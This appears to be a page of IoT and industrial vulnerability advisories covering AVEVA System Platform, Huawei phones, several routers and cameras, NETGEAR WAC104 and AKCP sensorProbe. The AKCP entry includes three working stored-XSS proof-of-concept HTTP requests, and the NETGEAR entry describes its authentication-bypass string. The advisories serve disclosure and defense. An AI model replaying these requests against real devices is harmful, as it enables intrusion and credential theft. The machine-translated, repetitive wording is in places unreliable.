VARIoT IoT vulnerabilities database

AVEVA System Platform versions 2017 through 2020 R2 P01 does not properly verify that the source of data or communication is valid. AVEVA Provided by the company AVEVA System Platform contains multiple vulnerabilities: * Lack of authentication for critical features (CWE-306) - CVE-2021-33008 It was * Problems with not handling exceptions (CWE-248) - CVE-2021-33010 It was * Path traversal (CWE-22) - CVE-2021-32981 It was * Same-origin policy violation (CWE-346) - CVE-2021-32985 It was * Improper verification of digital signatures (CWE-347) - CVE-2021-32977The expected impact depends on each vulnerability, but it may be affected as follows. It was * A third party on an adjacent network may be able to execute arbitrary code with system privileges. - CVE-2021-33008 It was * Service operation obstruction by a remote third party (DoS) state - CVE-2021-33010 It was * The input value that specifies a file or directory under an access-restricted directory is not processed properly, allowing a remote third party to access a directory outside the access-restricted directory. AVEVA System Platform is an application software of British AVEVA company. A responsive, standards-driven and scalable foundation for regulatory, enterprise SCADA, MES and IIoT applications. No detailed vulnerability details are currently available

AVEVA System Platform versions 2017 through 2020 R2 P01 uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. AVEVA Provided by the company AVEVA System Platform contains multiple vulnerabilities: * Lack of authentication for critical features (CWE-306) - CVE-2021-33008 It was * Problems with not handling exceptions (CWE-248) - CVE-2021-33010 It was * Path traversal (CWE-22) - CVE-2021-32981 It was * Same-origin policy violation (CWE-346) - CVE-2021-32985 It was * Improper verification of digital signatures (CWE-347) - CVE-2021-32977The expected impact depends on each vulnerability, but it may be affected as follows. It was * A third party on an adjacent network may be able to execute arbitrary code with system privileges. - CVE-2021-33008 It was * Service operation obstruction by a remote third party (DoS) state - CVE-2021-33010 It was * The input value that specifies a file or directory under an access-restricted directory is not processed properly, allowing a remote third party to access a directory outside the access-restricted directory. - CVE-2021-32981 It was * Not properly validating that data or communication origin is valid - CVE-2021-32985 It was * Not verifying digital signatures on data, or verifying them incorrectly - CVE-2021-32977. AVEVA System Platform is an application software of British AVEVA company. A responsive, standards-driven and scalable foundation for regulatory, enterprise SCADA, MES and IIoT applications. No detailed vulnerability details are currently provided

There is an Improper Access Control vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause temporary DoS. Huawei Smartphone is a smartphone of the Chinese company Huawei (Huawei)

There is an Improper Access Control vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause temporary DoS. Huawei Smartphone is a smartphone of the Chinese company Huawei (Huawei)

There is a Configuration Defect vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may affect service integrity and availability. Huawei Smartphone is a smartphone of the Chinese company Huawei (Huawei)

There is a Missing Cryptographic Step vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause DoS of Samgr. Huawei Smartphone is a smartphone of the Chinese company Huawei (Huawei)

The micro-enterprise integrated gateway is a VPN router under the Tenda brand. Tenda Micro-enterprise integrated gateway has a logic flaw vulnerability, which can be used by attackers to gain unauthorized access.

RG-NBS2026G is a switch launched by Beijing Xingwang Ruijie Network Technology Co., Ltd. Beijing Xingwang Ruijie Network Technology Co., Ltd. RG-NBS2026G has a command execution vulnerability, which can be used by attackers to execute arbitrary commands.

NBG-416N is a wireless router device launched by Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. NBG-416N has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

NBG-418N is a wireless router device launched by Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. NBG-418N has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Shandong Bit Intelligent Technology Co., Ltd. is a high-tech enterprise integrating design, research and development, production and sales. Shandong Bit Intelligent Technology Co., Ltd. Lim-SW5PV8 has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

S5100 and P5100 are hardware gateway products of Sangfor Technology Co., Ltd. Sangfor Technology Co., Ltd. S5100 and P5100 have a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Shandong Bit Intelligent Technology Co., Ltd. is a high-tech enterprise integrating design, research and development, production and sales. Shandong Bit Intelligent Technology Co., Ltd. Lim-SW5PV24 has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

TL-IPC223, etc. are all network camera products of Prolink Technology Co., Ltd. Many products of Prolink Technology Co., Ltd. have weak password vulnerabilities, which can be exploited by attackers to obtain sensitive information.

BRICS Communication Technology is the world's leading provider of online video solutions. The Brickcom FB-200Np camera has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

NETGEAR WAC104 devices before 1.0.4.15 are affected by an authentication bypass vulnerability in /usr/sbin/mini_httpd, allowing an unauthenticated attacker to invoke any action by adding the &currentsetting.htm substring to the HTTP query, a related issue to CVE-2020-27866. This directly allows the attacker to change the web UI password, and eventually to enable debug mode (telnetd) and gain a shell on the device as the admin limited-user account (however, escalation to root is simple because of weak permissions on the /etc/ directory). NETGEAR WAC104 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. NETGEAR WAC104 is a wireless access point (AP) from Netgear

A component of the HarmonyOS has a Improper Privilege Management vulnerability. Local attackers may exploit this vulnerability to bypass user restrictions. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have security flaws. Successful exploitation of this vulnerability could compromise service confidentiality, availability, and integrity

A component of the HarmonyOS has a Privilege Dropping / Lowering Errors vulnerability. Local attackers may exploit this vulnerability to obtain Kernel space read/write capability. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have a security flaw that stems from incorrect permission assignments. This vulnerability could affect service confidentiality

There is an Integer Overflow Vulnerability in Huawei Smartphone. Successful exploitation of these vulnerabilities may escalate the permission to that of the root user. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have security flaws